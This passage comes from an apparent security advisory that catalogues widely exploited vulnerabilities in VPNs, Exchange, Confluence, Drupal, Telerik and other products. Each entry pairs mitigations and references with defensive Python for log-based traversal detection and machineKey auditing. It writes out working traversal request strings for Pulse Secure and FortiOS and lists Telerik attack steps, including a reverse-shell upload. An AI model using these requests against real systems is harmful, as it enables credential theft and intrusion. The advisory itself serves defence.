Pulse Secure Connect is vulnerable to unauthenticated arbitrary file disclosure. An attacker can exploit this vulnerability to gain access to administrative credentials.

_**CVSS 3.0**_

Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

Improper access controls allow a directory traversal that an attacker can exploit to read the contents of system files. For example, the attacker could use a string such as `https://sslvpn.insecure-org.com/dana-na/../dana/html5/acc/guacmole/../../../../../../etc/passwd?/dana/html5/guacamole/` to obtain the local password file from the system. The attacker can also obtain admin session data and replay session tokens in the browser. Once compromised, an attacker can run arbitrary scripts on any host that connects to the VPN, which makes anyone connecting to the VPN a potential target for compromise.
_Multiple malware campaigns have taken advantage of this vulnerability, most notably REvil/Sodinokibi ransomware._

_**Fix**_

[Patch Available](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)

_**Recommended Mitigations**_

 * Upgrade to the latest Pulse Secure VPN.
 * Stay alert to any scheduled tasks or unknown files/executables.
 * Create detection/protection mechanisms that respond on directory traversal (`/../../../`) attempts to read local system files.

_**Detection Methods**_

 * CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisagov/check-your-pulse.
 * Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019-11510.nse #1708.

_**Vulnerable Technologies and Versions**_

Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 are vulnerable.

_**References**_

 * [NIST NVD Vulnerability Detail: CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)
 * [CISA Alert: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)
 * [Pulse Security Advisory: SA44101 – 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)
 * [GitHub: cisagov / Check Your Pulse](<https://github.com/cisagov/check-your-pulse>)
 * [CISA Analysis Report: Federal Agency Compromised by Malicious Cyber Actor](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a>)
 * [CISA Alert: Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>)
 * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S.
Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)
 * [NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)
 * [DoJ Press Release: Seven International Cyber Defendants, Including “Apt41” Actors, Charged in Connection with Computer Intrusion Campaigns Against More Than 100 Victims Globally](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>)
 * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)
 * [FBI FLASH: Indicators Associated with Netwalker Ransomware](<https://www.ic3.gov/Media/News/2020/200929-2.pdf>)
 * [FBI FLASH: Indictment of China-Based Cyber Actors Associated with APT 41 for Intrusion Activities](<https://www.ic3.gov/Media/News/2020/201103-2.pdf>)

_Table 4: CVE-2018-13379 Vulnerability Details_

**Fortinet FortiOS Secure Socket Layer VPN (CVE-2018-13379)**

_**Vulnerability Description**_

Fortinet Secure Sockets Layer (SSL) VPN is vulnerable to unauthenticated directory traversal, which allows attackers to gain access to the `sslvpn_websession` file. An attacker is then able to extract clear-text usernames and passwords.

_**CVSS 3.0**_

Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

Weakness in user access controls and web application directory structure allows attackers to read system files without authentication. Attackers are able to perform an `HTTP GET` request of the form `http://$SSLVPNTARGET?lang=/../../../..//////////dev/cmdb/sslvpn_websession`. This results in the server responding with unprintable/hex characters alongside cleartext credential information.
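Table 3's mitigations recommend detection mechanisms that respond to directory-traversal (`/../../../`) attempts against local system files, and the request strings quoted for Citrix (Table 2), Pulse Secure (Table 3), and FortiOS (Table 4) all share that shape. As an added example, not part of the advisory, the Python below runs that detection over constructed web-access-log lines in combined format, percent-decoding and collapsing repeated slashes first so that encoded variants of `..` are caught, and rates a 2xx response to a traversal aimed at a named file above a blocked attempt. The sample lines, the 203.0.113.x addresses, and the `/remote/fgt_lang` path prefix on the FortiOS request are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not real traffic) that mimic the request shapes quoted in
# Tables 2-4: Citrix newbm.pl, Pulse /dana-na traversal, FortiOS sslvpn_websession,
# one benign Pulse request, and a percent-encoded retry of the Citrix path.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jan/2020:10:01:22 +0000] "POST /vpn/../vpn/portal/scripts/newbm.pl HTTP/1.1" 200 512 "-" "curl/7.64.0"
203.0.113.8 - - [12/Jan/2020:10:02:05 +0000] "GET /dana-na/../dana/html5/acc/guacamole/../../../../../../etc/passwd?/dana/html5/guacamole/ HTTP/1.1" 200 2048 "-" "python-requests/2.22"
203.0.113.9 - - [12/Jan/2020:10:03:41 +0000] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Jan/2020:10:04:00 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.11 - - [12/Jan/2020:10:05:13 +0000] "GET /vpn/%2e%2e/vpn/portal/scripts/newbm.pl HTTP/1.1" 404 0 "-" "curl/7.64.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target HTTP/x", status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Files/scripts the advisory names as the goal of each traversal, mapped to the CVE.
SENSITIVE_TARGETS = {
    "newbm.pl": "CVE-2019-19781",           # Citrix ADC: Perl script reached via /vpn/../
    "/etc/passwd": "CVE-2019-11510",        # Pulse Secure: arbitrary file read
    "sslvpn_websession": "CVE-2018-13379",  # FortiOS: session file with cleartext creds
}


def normalize_target(target: str) -> str:
    """Percent-decode twice (so %252e double encoding is also resolved) and collapse
    runs of slashes, turning forms like /..//////dev and /%2e%2e/ into plain /../."""
    decoded = unquote(unquote(target))
    return re.sub(r"/{2,}", "/", decoded)


def classify(line: str):
    """Return a finding dict for a traversal attempt, or None for a benign line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    norm = normalize_target(m.group("target"))
    if "/../" not in norm and not norm.endswith("/.."):
        return None
    cves = sorted({cve for needle, cve in SENSITIVE_TARGETS.items() if needle in norm})
    status = int(m.group("status"))
    return {
        "src": m.group("src"),
        "timestamp": m.group("ts"),
        "method": m.group("method"),
        "target": m.group("target"),
        "status": status,
        "cves": cves,
        # A 2xx on a traversal to a named file means the appliance served it; treat
        # that as likely compromise, anything else as a blocked or failed attempt.
        "severity": "likely-compromise" if 200 <= status < 300 and cves else "attempt",
    }


def scan(lines):
    """Run classify() over an iterable of log lines and keep the findings."""
    return [f for f in (classify(line) for line in lines) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        cves = ",".join(f["cves"]) or "-"
        print(f"{f['severity']:18} {f['src']:14} {f['status']} {cves} {f['target']}")
```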
_Multiple malware campaigns have taken advantage of this vulnerability, the most notable being Cring ransomware (also known as Crypt3, Ghost, Phantom, and Vjszy1lo)._

_**Fix**_

[Patch Available](<https://www.fortiguard.com/psirt/FG-IR-18-384>)

_**Recommended Mitigations**_

 * Upgrade to the latest Fortinet SSL VPN.
 * Monitor for alerts to any unscheduled tasks or unknown files/executables.
 * Create detection/protection mechanisms that respond on directory traversal (`/../../../`) attempts to read the `sslvpn_websessions` file.

_**Detection Methods**_

 * Nmap developed a script that can be used with the port scanning engine: Fortinet SSL VPN CVE-2018-13379 vuln scanner #1709.

_**Vulnerable Technologies and Versions**_

Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7, and 5.4.6 to 5.4.12 are vulnerable.

_**References**_

 * [FortiOS System File Leak Through SSL VPN via Specialty Crafted HTTP Resource Requests](<https://www.fortiguard.com/psirt/FG-IR-18-384>)
 * [GitHub: Fortinet SSL VPN CVE-2018-13379 Vuln Scanner #1709](<https://github.com/nmap/nmap/pull/1709>)
 * [Fortinet Blog: Update Regarding CVE-2018-13379](<https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2018-13379>)
 * [NIST NVD Vulnerability Detail: CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)
 * [FBI-CISA Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)
 * [FBI-CISA Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks](<https://www.ic3.gov/Media/News/2021/210402.pdf>)
 * [NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)
 * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S.
and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)
 * [FBI FLASH: APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity](<https://www.ic3.gov/Media/News/2021/210527.pdf>)

_Table 5: CVE-2020-5902 Vulnerability Details_

**F5 Big IP Traffic Management User Interface (CVE-2020-5902)**

_**Vulnerability Description**_

The Traffic Management User Interface (TMUI), also referred to as the Configuration Utility, has an RCE vulnerability in undisclosed pages.

_**CVSS 3.0**_

Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

This vulnerability allows unauthenticated attackers, or authenticated users, with network access to the Configuration Utility (through the BIG-IP management port and/or self IPs) to execute arbitrary system commands, create or delete files, disable services, and execute arbitrary Java code. This vulnerability may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected.

_**Fix**_

[Upgrade to Secure Versions Available](<https://support.f5.com/csp/article/K52145254>)

_**Recommended Mitigations**_

Download and install a fixed version of the software from a vendor-approved resource. If it is not possible to update quickly, restrict access via the following actions.

 * Address unauthenticated and authenticated attackers on self IPs by blocking all access.
 * Address unauthenticated attackers on the management interface by restricting access.

_**Detection Methods**_

 * F5 developed a free detection tool for this vulnerability: [f5devcentral / cve-2020-5902-ioc-bigip-checker](<https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/>).
 * Manually check your software version to see if it is susceptible to this vulnerability.

_**Vulnerable Technologies and Versions**_

BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) 15.1.0, 15.0.0-15.0.1, 14.1.0-14.1.2, 13.1.0-13.1.3, 12.1.0-12.1.5, and 11.6.1-11.6.5 are vulnerable.

_**References**_

 * [F5 Article: TMUI RCE Vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)
 * [NIST NVD Vulnerability Detail: CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)
 * [CISA Alert: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)
 * [MITRE CVE Record: CVE-2020-5902](<https://vulners.com/cve/CVE-2020-5902>)

_Table 6: CVE-2020-15505 Vulnerability Details_

**MobileIron Core & Connector (CVE-2020-15505)**

_**Vulnerability Description**_

MobileIron Core & Connector, Sentry, and Monitoring and Reporting Database (RDB) software are vulnerable to RCE via unspecified vectors.

_**CVSS 3.0**_

Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

CVE-2020-15505 is an RCE vulnerability in MobileIron Core & Connector versions 10.3 and earlier. This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.

Multiple APTs have been observed exploiting this vulnerability to gain unauthorized access.

_**Fix**_

[Patch Available](<https://www.ivanti.com/blog/mobileiron-security-updates-available>)

_**Recommended Mitigations**_

 * Download and install a fixed version of the software from a vendor-approved resource.

_**Detection Methods**_

 * None.
Manually check your software version to see if it is susceptible to this vulnerability.

_**Vulnerable Technologies and Versions**_

MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0, and 10.6.0.0; Sentry versions 9.7.2 and earlier and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier are vulnerable.

_**References**_

 * [Ivanti Blog: MobileIron Security Updates Available](<https://www.ivanti.com/blog/mobileiron-security-updates-available>)
 * [CISA-FBI Joint Cybersecurity Advisory: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)
 * [NIST NVD Vulnerability Detail: CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)
 * [MITRE CVE Record: CVE-2020-15505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-15505>)
 * [NSA Cybersecurity Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)

_Table 7: CVE-2020-0688 Vulnerability Details_

**Microsoft Exchange Memory Corruption (CVE-2020-0688)**

_**Vulnerability Description**_

An RCE vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory.

_**CVSS 3.0**_

High

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

CVE-2020-0688 exists in the Microsoft Exchange Server when the server fails to properly create unique keys at install time. An authenticated user with knowledge of the validation key and a mailbox may pass arbitrary objects for deserialization by the web application that runs as `SYSTEM`. The security update addresses the vulnerability by correcting how Microsoft Exchange creates the keys during install.
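The root cause above is that unpatched installs share one static validation key rather than generating unique keys. A fleet-wide way to check for that condition, as an added example that is not part of the advisory or of any Microsoft tooling, is to collect each server's `<machineKey>` element from the ECP application's `web.config` and flag any key pair that appears on more than one server; the four server names and the key values below are constructed for the demo, and the location of `web.config` depends on your install.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed web.config fragments for four hypothetical Exchange servers (exch01..04).
# The key values are made up for this example; the check never needs the real static
# values, it only asks whether the same pair shows up on more than one server.
CONFIGS = {
    "exch01": ('<configuration><system.web><machineKey validationKey="1111AAAA" '
               'decryptionKey="2222BBBB" validation="SHA1" decryption="3DES"/>'
               '</system.web></configuration>'),
    "exch02": ('<configuration><system.web><machineKey validationKey="1111AAAA" '
               'decryptionKey="2222BBBB" validation="SHA1" decryption="3DES"/>'
               '</system.web></configuration>'),
    "exch03": ('<configuration><system.web><machineKey validationKey="3333CCCC" '
               'decryptionKey="4444DDDD" validation="SHA1" decryption="3DES"/>'
               '</system.web></configuration>'),
    "exch04": '<configuration><system.web><compilation debug="false"/></system.web></configuration>',
}


def extract_machine_key(web_config_xml):
    """Return (validationKey, decryptionKey) from <system.web><machineKey>, or None
    when the element is absent."""
    root = ET.fromstring(web_config_xml)
    node = root.find("./system.web/machineKey")
    if node is None:
        return None
    return node.get("validationKey"), node.get("decryptionKey")


def find_shared_keys(configs):
    """Group servers by their machineKey pair.

    The patched installer generates unique keys per server, so a pair that appears
    on two or more servers means the static keys the advisory describes are still in
    place, and an authenticated mailbox user who knows them could pass arbitrary
    objects for deserialization. Returns (shared, missing): shared maps a key pair
    to the hosts using it; missing lists hosts whose config has no machineKey
    element and must be checked by hand.
    """
    by_key = defaultdict(list)
    missing = []
    for host, xml_text in configs.items():
        key = extract_machine_key(xml_text)
        if key is None:
            missing.append(host)
            continue
        if key[0] and key[0].startswith("AutoGenerate"):
            continue  # ASP.NET auto-generated keys are per machine and cannot repeat
        by_key[key].append(host)
    shared = {key: sorted(hosts) for key, hosts in by_key.items() if len(hosts) > 1}
    return shared, sorted(missing)


if __name__ == "__main__":
    # In practice, read each server's ECP web.config into the dict instead of the
    # constructed fragments above.
    shared, missing = find_shared_keys(CONFIGS)
    for (vkey, _dkey), hosts in shared.items():
        print(f"shared machineKey (validationKey={vkey!r}) on: {', '.join(hosts)}")
    for host in missing:
        print(f"{host}: no machineKey element, review manually")
```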
_A nation-state APT actor has been observed exploiting this vulnerability to conduct widespread, distributed, and anonymized brute force access attempts against hundreds of government and private sector targets worldwide._

_**Fix**_

[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)

_**Recommended Mitigations**_

 * Download and install a fixed version of the software from a vendor-approved resource.

_**Detection Methods**_

 * Manually check your software version to see if it is susceptible to this vulnerability.
 * CVE-2020-0688 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>.

_**Vulnerable Technologies and Versions**_

Microsoft Exchange Server 2019 Cumulative Update 3 and 4, 2016 Cumulative Update 14 and 15, 2013 Cumulative Update 23, and 2010 Service Pack 3 Update Rollup 30 are vulnerable.

_**References**_

 * [Microsoft Security Update Guide: CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)
 * [NIST NVD Vulnerability Detail: CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)
 * [Microsoft Security Update: Description of the security update for Microsoft Exchange Server 2019 and 2016: February 11, 2020](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-and-2016-february-11-2020-94ac1ebb-fb8a-b536-9240-a1cab0fd1c9f>)
 * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S.
Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)
 * [ACSC Alert: Active Exploitation of Vulnerability in Microsoft Internet Information Services](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerability-microsoft-internet-information-services>)
 * [NSA-CISA-FBI-NCSC Cybersecurity Advisory: Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)

_Table 8: CVE-2019-3396 Vulnerability Details_

**Atlassian Confluence Server and Data Center Widget Connector (CVE-2019-3396)**

_**Vulnerability Description**_

Atlassian Confluence Server and Data Center Widget Connector is vulnerable to a server-side template injection attack.

_**CVSS**_

Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

Confluence Server and Data Center versions released before June 18, 2018, are vulnerable to this issue. A remote attacker is able to exploit a server-side request forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance. A successful attack is able to exploit this issue to achieve server-side template injection, path traversal, and RCE on vulnerable systems.

_Multiple malware campaigns have taken advantage of this vulnerability; the most notable being GandCrab ransomware._

_**Fix**_

Patch Available

_**Recommended Mitigations**_

 * Download and install a fixed version of the software from a vendor-approved resource.

_**Detection Methods**_

 * Manually check the software version to see if it is susceptible to this vulnerability.
 * CVE-2019-3396 is commonly exploited to install web shell malware.
NSA provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>.

_**Vulnerable Technologies and Versions**_

All versions of Confluence Server and Confluence Data Center before version 6.6.12, from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x) are vulnerable.

_**References**_

 * [NIST NVD Vulnerability Detail: CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>)
 * [MITRE CVE Record: CVE-2019-3396](<https://vulners.com/cve/CVE-2019-3396>)
 * [Confluence Security Advisory: Confluence Data Center and Server 7.12](<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>)
 * [Confluence Server and Data Center CONFSERVER-57974: Remote Code Execution via Widget Connector Macro - CVE-2019-3396](<https://jira.atlassian.com/browse/CONFSERVER-57974>)
 * [TrendMicro Research Article: CVE-2019-3396: Exploiting the Confluence Vulnerability](<https://www.trendmicro.com/en_us/research/19/e/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit.html>)

_Table 9: CVE-2017-11882 Vulnerability Details_

**Microsoft Office Memory Corruption (CVE-2017-11882)**

_**Vulnerability Description**_

Microsoft Office is prone to a memory corruption vulnerability allowing an attacker to run arbitrary code, in the context of the current user, by failing to properly handle objects in memory. It is also known as the "Microsoft Office Memory Corruption Vulnerability."

Cyber actors continued to exploit this four-year-old vulnerability in Microsoft Office that the U.S.
Government publicly assessed last year was the most frequently targeted. Cyber actors most likely continue to exploit this vulnerability because Microsoft Office use is ubiquitous worldwide, the vulnerability is ideal for phishing campaigns, and it enables RCE on vulnerable systems.

_**CVSS 3.0**_

High

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

Microsoft Equation Editor, a component of Microsoft Office, contains a stack buffer overflow vulnerability that enables RCE on a vulnerable system. The component was compiled on November 9, 2000. Without any further recompilation, it was used in all currently supported versions of Microsoft Office. Microsoft Equation Editor is an out-of-process COM server that is hosted by `eqnedt32.exe`, meaning it runs as its own process and can accept commands from other processes.

Data execution prevention (DEP) and address space layout randomization (ASLR) should protect against such attacks. However, because of the manner in which `eqnedt32.exe` was linked, it will not use these features, subsequently allowing code execution. Being an out-of-process COM server, protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard are not applicable to `eqnedt32.exe`, unless applied system-wide. This provides the attacker with an avenue to lure targets into opening specially crafted documents, resulting in the ability to execute embedded attacker commands.

_Multiple cyber espionage campaigns have taken advantage of this vulnerability.
CISA has noted CVE-2017-11882 being exploited to [deliver LokiBot malware](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>)._

_**Fix**_

[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>)

_**Recommended Mitigations**_

 * To remediate this issue, administrators should deploy Microsoft’s patch for this vulnerability: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>.
 * Those who cannot deploy the patch should consider disabling the Equation Editor as discussed in [Microsoft Knowledge Base Article 4055535](<https://support.microsoft.com/en-us/topic/how-to-disable-equation-editor-3-0-7e000f58-cbf4-e805-b4b1-fde0243c9a92>).

_**Detection Methods**_

 * Microsoft Defender Antivirus, Windows Defender, Microsoft Security Essentials, and the Microsoft Safety Scanner will all detect and patch this vulnerability.

_**Vulnerable Technologies and Versions**_

 * Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 are vulnerable.
_**References**_

 * [NIST NVD Vulnerability Detail: CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)
 * [CISA Malware Analysis Report: MAR-10211350-1.v2](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133e>)
 * [Palo Alto Networks Analysis: Analysis of CVE-2017-11882 Exploit in the Wild](<https://unit42.paloaltonetworks.com/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/>)
 * [CERT Coordination Center Vulnerability Note: Microsoft Office Equation Editor stack buffer overflow](<https://www.kb.cert.org/vuls/id/421280>)

_Table 10: CVE-2019-11580 Vulnerability Details_

**Atlassian Crowd and Crowd Data Center Remote Code Execution (CVE-2019-11580)**

_**Vulnerability Description**_

Atlassian Crowd and Crowd Data Center had the `pdkinstall` development plugin incorrectly enabled in release builds.

_**CVSS 3.0**_

Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits RCE on systems running a vulnerable version of Crowd or Crowd Data Center.

_**Fix**_

[Patch Available](<https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html>)

_**Recommended Mitigations**_

 * Atlassian recommends customers running a version of Crowd below version 3.3.0 to upgrade to version 3.2.8. For customers running a version above or equal to 3.3.0, Atlassian recommends upgrading to the latest version.
 * Released Crowd and Crowd Data Center version 3.4.4 contains a fix for this issue and is available at <https://www.atlassian.com/software/crowd/download>.
 * Released Crowd and Crowd Data Center versions 3.0.5, 3.1.6, 3.2.8, and 3.3.5 contain a fix for this issue and are available at <https://www.atlassian.com/software/crowd/download-archive>.
_**Detection Methods**_

 * Manually check your software version to see if it is susceptible to this vulnerability.
 * CVE-2019-11580 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>.

_**Vulnerable Technologies and Versions**_

All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.

_**References**_

 * [NIST NVD Vulnerability Detail: CVE-2019-11580](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>)
 * [Crowd CWD-5388: Crowd – pdkinstall Development Plugin Incorrectly Enabled – CVE-2019-11580](<https://jira.atlassian.com/browse/CWD-5388>)
 * [Crowd Security Advisory: Crowd Data Center and Server 4.3](<https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html>)

_Table 11: CVE-2018-7600 Vulnerability Details_

**Drupal Core Multiple Remote Code Execution (CVE-2018-7600)**

_**Vulnerability Description**_

Drupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allow remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

_**CVSS 3.0**_

Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

An RCE vulnerability exists within multiple subsystems of Drupal 7.x and
8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. Failed exploit attempts may result in a denial-of-service condition. A remote user can send specially crafted data to trigger a flaw in the processing of renderable arrays in the Form Application Programming Interface, or API, and cause the target system to render the user-supplied data and execute arbitrary code on the target system.

_Malware campaigns include the Muhstik botnet and XMRig Monero cryptocurrency mining._

_**Fix**_

[Patch Available](<https://www.drupal.org/sa-core-2018-002>)

_**Recommended Mitigations**_

 * Upgrade to the most recent version of Drupal 7 or 8 core. If running 7.x, upgrade to Drupal 7.58. If running 8.5.x, upgrade to Drupal 8.5.1.

_**Detection Methods**_

 * Dan Sharvit developed a tool to check for the CVE-2018-7600 vulnerability on several URLs: <https://github.com/sl4cky/CVE-2018-7600-Masschecker/blob/master/Drupalgeddon-mass.py>.

_**Vulnerable Technologies and Versions**_

 * Drupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are affected.

_**References**_

 * [Drupal Security Advisory: Drupal Core - Highly Critical - Remote Code Execution - SA-CORE-2018-002](<https://www.drupal.org/sa-core-2018-002>)
 * [NIST NVD Vulnerability Detail: CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>)
 * [Drupal Groups: FAQ about SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>)

_Table 12: CVE-2019-18935 Vulnerability Details_

**Telerik UI for ASP.NET AJAX Insecure Deserialization (CVE-2019-18935)**

_**Vulnerability Description**_

Telerik User Interface (UI) for ASP.NET does not properly filter serialized input for malicious content.
Versions prior to R1 2020 (2020.1.114) are susceptible to remote code execution attacks on affected web servers due to a deserialization vulnerability.

_**CVSS 3.0**_

Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

The Telerik UI does not properly sanitize serialized data inputs from the user. This vulnerability leads to the application being vulnerable to RCE attacks that may lead to a full system compromise. A vulnerable `HTTP POST` parameter `rauPostData` makes use of a vulnerable function/object `AsyncUploadHandler`. The object/function uses the `JavaScriptSerializer.Deserialize()` method, which does not properly sanitize the serialized data during the deserialization process. This issue is attacked by:

 1. Determining the vulnerable function is available/registered: `http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau`,
 2. Determining if the version running is vulnerable by querying the UI, and
 3. Creating an object (e.g., a malicious mixed-mode DLL with native OS commands or a reverse shell) and uploading the object via the `rauPostData` parameter along with the proper encryption key.

_There were two malware campaigns associated with this vulnerability:_

 * _Netwalker Ransomware and_
 * _Blue Mockbird Monero Cryptocurrency-mining._

_**Fix**_

